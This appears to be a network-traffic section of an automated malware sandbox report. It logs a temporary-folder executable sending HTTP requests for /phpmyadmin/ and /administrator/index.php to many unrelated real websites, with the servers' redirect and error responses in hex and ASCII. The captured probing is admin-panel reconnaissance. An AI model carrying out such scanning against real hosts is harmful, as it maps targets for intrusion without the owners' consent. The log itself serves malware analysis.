                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 34 37 2d 32 37 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 4d 69 72 72 6f 72 65 64 20 66 72 6f 6d 20 77 77 77 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 3c 21 2d 2d 20 2f 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 50 61 67 65 20 68 61 73 20 6d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.800630093 CET288INData Raw: 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 52 65 66 72 65 73 68 22 20 43 4f 4e 54 45 4e 54 3d 22 30 3b 20 55 52 4c 3d 68 74 74 70 3a 2f 2f 64 65 63 6c 61 72 61 63 69 6f 6e 65 73 2e 73 65 6e 69 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.800666094 CET83INData Raw: 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Track Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.802794933 CET255OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://contribuyente.seniat.gob.ve/index.htm
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.969780922 CET499INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Location: http://contribuyente.seniat.gob.ve/index.htm
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 66 38 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 74 72 69 62 75 79 65 6e 74 65 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 69 6e 64 65 78 2e 68 74 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.970395088 CET241OUTGET /index.htm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://contribuyente.seniat.gob.ve/index.htm
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.137547970 CET1160INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: HttpOnly;Secure
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self';
                                                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Clear-Site-Data: cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY, SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Expect-CT: enforce; max-age=43200
                                                                                                                                                                                                                                                                                                                                                                Public-Key-Pins: none
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 15 May 2023 15:21:36 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "11fc95-2dd-64624e00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 733
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 34 37 2d 32 37 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 4d 69 72 72 6f 72 65 64 20 66 72 6f 6d 20 77 77 77 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 3c 21 2d 2d 20 2f 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 50 61 67 65 20 68 61 73 20 6d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.137558937 CET288INData Raw: 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 52 65 66 72 65 73 68 22 20 43 4f 4e 54 45 4e 54 3d 22 30 3b 20 55 52 4c 3d 68 74 74 70 3a 2f 2f 64 65 63 6c 61 72 61 63 69 6f 6e 65 73 2e 73 65 6e 69 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.137568951 CET83INData Raw: 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Track Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                271192.168.2.6566243.161.150.8980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.533380032 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.637554884 CET580INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 e265f20f047ccdd0006f2da8a274008c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: LL8LDuZPMKR6IM3CGOE576AEsl5wvL53jVuI8ChKlfAP3KkO5Sk6jw==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                272192.168.2.65663554.158.51.6080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.587632895 CET179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.706039906 CET582INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB744A830D565795711296B8A4B34F8EFBFA6DDAF7B9110B0A46B575850AB86F0E3E029364A64F3950B0D9546BF4A0B5BE0CC;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                273192.168.2.656638104.21.14.24580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.589788914 CET175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.717502117 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHBJFymD2utvH5IoFxvviVDfMMjs%2BO4VuuRlw3LrJiumvQ2ulG0O4bVONnpEC%2FfkkNSfuaiOQJUaev7pEHWA%2BD30J%2F3hfn8884xXOGWzVNJAkGD8nazHUXMN7A4Dlkh5DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb77098ab129-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f db 38 12 fd df 9f 62 a2 03 12 1b 88 24 bb db 5e 12 5b d6 61 af cd 01 01 7a d8 de 36 c5 5d b1 28 02 8a 1c 59 dc 50 a4 96 a4 ac 18 d9 7c f7 05 45 c9 91 7f 24 7b c5 1d 10 20 a2 38 7c 33 f3 f8 66 44 3a 39 f9 f0 d3 fb db af 9f ae a1 b0 a5 48 47 c9 49 18 fe c2 73 10 16 6e ae e1 e2 5b 0a 89 9b 00 2a 88 31 cb 40 aa f0 57 03 1c ff 0a 4a 30 8e 01 08 22 57 cb 00 65 f8 e5 73 90 42 72 f2 0b 4a c6 f3 6f 61 f8 0c d5 e1 00 1c 87 ba f8 3e a8 cb 57 a0 2e bf 03 6a 65 3b 34 f7 e2 58 96 87 28 61 b8 8b 54 20 61 e9 28 b1 dc 0a 4c 7f b4 16 a5 e5 4a c2 cf f8 5b cd 35 b2 13 f8 1d de 0b 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 97 c1 97 db 7f 84 97 01 c4 fd 44 61 6d 15 3a 84 f5 32 78 af a4 03 0d 6f 37 15 06 40 fd 68 19 58 7c b0 b1 8b 77 b1 85 79 0d e5 3f e1 97 1f c3 f7 aa ac 88 e5 99 18 02 dd 5c 2f af d9 0a 07 eb 24 29 71 19 68 95 29 6b 06 86 52 71 c9 f0 e1 1c a4 ca 95 10 aa 39 58 b2 e6 d8 54 4a db c1 a2 86 33 5b 2c 19 ae 39 c5 b0 1d 9c 73 c9 2d 27 22 34 94 08 5c ce 3c 8a e0 f2 1e 34 8a 65 60 ec 46 a0 29 10 6d 00 9c 2d 03 9a df f9 57 21 35 26 80 42 63 be 0c 62 ca 64 48 57 3c f6 53 31 cd 23 d4 5a 69 13 b5 46 f1 be 86 af be a5 2f bb 38 7b 76 c1 d1 79 39 fb 53 2f 1c 7b 47 bb 6a 68 0d d3 4c b1 cd 63 49 f4 8a cb f9 74 51 11 c6 b8 5c cd a7 4f 89 07 4a 47 a3 81 02 d1 c5 37 9b 76 1a 1c 25 86 6a 5e d9 74 04 c0 73 18 9f 48 b2 e6 2b 62 95 8e a8 52 f7 1c af 25 c9 04 b2 09 3c 8e 5c 09 34 5c 32 d5 44 84 b1 eb 35 4a fb 91 1b 8b 12 f5 f8 ec c3 4f ff ec 94 f3 51 11 86 ec ec 1c f2 5a d2 56 9c e3 7e 35 c0 9a 68 e8 80 05 2c 81 29 5a 97 28 6d b4 42 7b 2d d0 3d fe 7d 73 c3 c6 67 de 26 24 02 b5 3d 9b 2c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c9Xo8b$^[az6](YP|E${ 8|3fD:9HGIsn[*1@WJ0"WesBrJoa>W.je;4X(aT a(LJ[5U\IFI-6hDam:2xo7@hX|wy?\/$)qh)kRq9XTJ3[,9s-'"4\<4e`F)m-W!5&BcbdHW<S1#ZiF/8{vy9S/{GjhLcItQ\OJG7v%j^tsH+bR%<\4\2D5JOQZV~5h,)Z(mB{-=}sg&$=,
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.717519999 CET1195INData Raw: ba d5 fd ca a8 cd 2b 62 dc 54 82 6c 60 09 67 99 50 f4 fe cc db 3d 4d 46 00 4f a3 24 ee 53 3b a8 a2 d1 28 89 bb 42 72 dc b9 e4 13 c6 d7 dd fe 87 8d 26 55 85 3a 48 5b b8 76 a6 2b 52 9a fb 90 a0 7f 08 db 0d 72 c3 2e e2 76 dc 29 69 90 43 00 8c 58 12
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: +bTl`gP=MFO$S;(Br&U:H[v+Rr.v)iCXZM+qG72AI 1u .K.\lK nEOAQ.uovDK[, FP5B(5BlfgTD=_VJ j UgP*LR.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.717536926 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                274192.168.2.656641172.66.40.8880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.593163013 CET176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.815274000 CET1140INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SATZtx%2BNaLJHDWM6NhmtMt1ID0ntZ4ZRnJ%2Bqhvl43Zxc3KJH7YcIeRZeSIeuKaJVc2wqmyTUSVJ00ZQ%2FxXAIGCWwg8mtnVQN5T9KpJwgxXB9tVAoKbjIDuLa%2F86HxMdWIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb770cf678d1-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 63 31 36 39 36 39 37 33 38 39 33 33 31 37 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 65 75 6f 46 47 6f 77 68 6c 61 4c 71 58 73 50 57 51 34 38 71 53 6b 42 53 43 46 73 33 44 50 52 79 69 77 56 75 33 46 6a 52 39 36 63 4d 50 78 2b 46 72 2b 67 70 57 52 68 49 61 66 63 48 77 71 77 43 71 57 53 34 32 52 5a 68 49 75 64 4f 76 45 49 2b 43 6b 66 36 4d 41 3d 3d 22 20 64 61 74 61 2d 63 66 2d 62 65 61 63 6f 6e 3d 27 7b 22 72 61 79 49 64 22 3a 22 38 35 30 61 62 62 37 37 30 63 66 36 37 38 64 31 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 30 32 34 2e 32 2e 30 22 2c 22 74 6f 6b 65 6e 22 3a 22 35 39 31 35 39 62 35 66 36 62 63 63 34 38 64 31 62 34 32 39 35 62 34 62 61 34 65 64 33 62 30 63 22 7d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abb770cf678d1","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.815316916 CET5INData Raw: 30 0d 0a 0d 0a
